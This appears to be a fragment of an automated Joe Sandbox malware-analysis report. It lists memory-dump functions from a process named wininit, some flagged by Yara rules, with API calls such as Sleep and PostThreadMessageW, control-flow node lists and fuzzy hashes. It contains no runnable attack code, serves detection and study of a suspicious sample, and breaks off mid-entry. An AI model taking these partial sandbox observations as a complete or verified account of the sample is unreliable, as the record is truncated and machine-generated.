                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0251FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F7300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 221 f7300-f732f 222 f733b-f7342 221->222 223 f7336 call fa020 221->223 224 f741c-f7422 222->224 225 f7348-f7398 call fa0f0 call e9b40 call f3e50 222->225 223->222 232 f73a0-f73b1 Sleep 225->232 233 f7416-f741a 232->233 234 f73b3-f73b9 232->234 233->224 233->232 235 f73bb-f73e1 call f6f30 234->235 236 f73e3-f7403 234->236 238 f7409-f740c 235->238 236->238 239 f7404 call f7130 236->239 238->233 239->238
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 000F73A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                                • Instruction ID: 0e544456cb97406e62d9c7b5ce2fc2a4494cbba9dd5d9479baa22b162e9d43f5
                                                • Opcode Fuzzy Hash: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                                • Instruction Fuzzy Hash: F131ADB6601604ABC721DF64C8A1FABB7F8AF88700F00811DFA1D9B642D770B945DBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F72F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 241 f72f6-f7342 call fa020 244 f741c-f7422 241->244 245 f7348-f7398 call fa0f0 call e9b40 call f3e50 241->245 252 f73a0-f73b1 Sleep 245->252 253 f7416-f741a 252->253 254 f73b3-f73b9 252->254 253->244 253->252 255 f73bb-f73e1 call f6f30 254->255 256 f73e3-f7403 254->256 258 f7409-f740c 255->258 256->258 259 f7404 call f7130 256->259 258->253 259->258
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 000F73A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: c23ba4bbd55b479bd2305550b5b3206460142f7904eccb94d46875295e1dfc80
                                                • Instruction ID: 282cfaccb460b74085fdfcdd4a0b6fad96d259b138c0a2d73c7b43b169d68853
                                                • Opcode Fuzzy Hash: c23ba4bbd55b479bd2305550b5b3206460142f7904eccb94d46875295e1dfc80
                                                • Instruction Fuzzy Hash: FD21C3B2605204ABC711DF64C8A1FABB7B4FF88700F00802DFA1DAB642E774A545DBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F88F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 267 f88f0-f8906 268 f890c-f8921 RtlFreeHeap 267->268 269 f8907 call f91e0 267->269 269->268
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000E3B93), ref: 000F891D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: ce23340cb5fe329eeb0fd674f18d3590397e251735bdedf0581a70d58f36fb4a
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 8BE046B1200208ABDB18EF99CC49EE777ACEF88750F018558FE085B242C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F88F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 f88f2-f8907 call f91e0 272 f890c-f8921 RtlFreeHeap 270->272
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000E3B93), ref: 000F891D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                                • Instruction ID: 2de99fdcd20d32bd2888d03012c7a8bf77d3c9afb39742b4a73d3ff568191fb4
                                                • Opcode Fuzzy Hash: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                                • Instruction Fuzzy Hash: AAE046B1200204AFDB18EF68CC48EE73768EF88350F018658FE0C9B242C631E910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000E7253, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 273 e7253-e725b 274 e725d-e725e 273->274 275 e72b8-e72ca call f3e50 273->275 277 e729c-e729f 274->277 278 e7260-e727d call f9b20 call f99d0 274->278 283 e72fe-e7302 275->283 284 e72cc-e72da PostThreadMessageW 275->284 281 e72db-e72de 277->281 282 e72a1-e72b3 call e9b40 277->282 285 e72fd 281->285 286 e72e0-e72fb call e92a0 PostThreadMessageW 281->286 282->275 284->281 285->283 286->285
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000E72DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000E72FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 544d0ca30ca3a73ef92cf80d5f9d354d0317ea1dbd6ca0cf474a473fe160780a
                                                • Instruction ID: 0bd70db0e69b5e803a38a3ae84b75ccc4e67e7ffc003315c05d66e30ed5c513e
                                                • Opcode Fuzzy Hash: 544d0ca30ca3a73ef92cf80d5f9d354d0317ea1dbd6ca0cf474a473fe160780a
                                                • Instruction Fuzzy Hash: D001F972A401647BDB21A6569C42FFE73589B40B10F150159FF08BE183E6A1690587E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000E7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
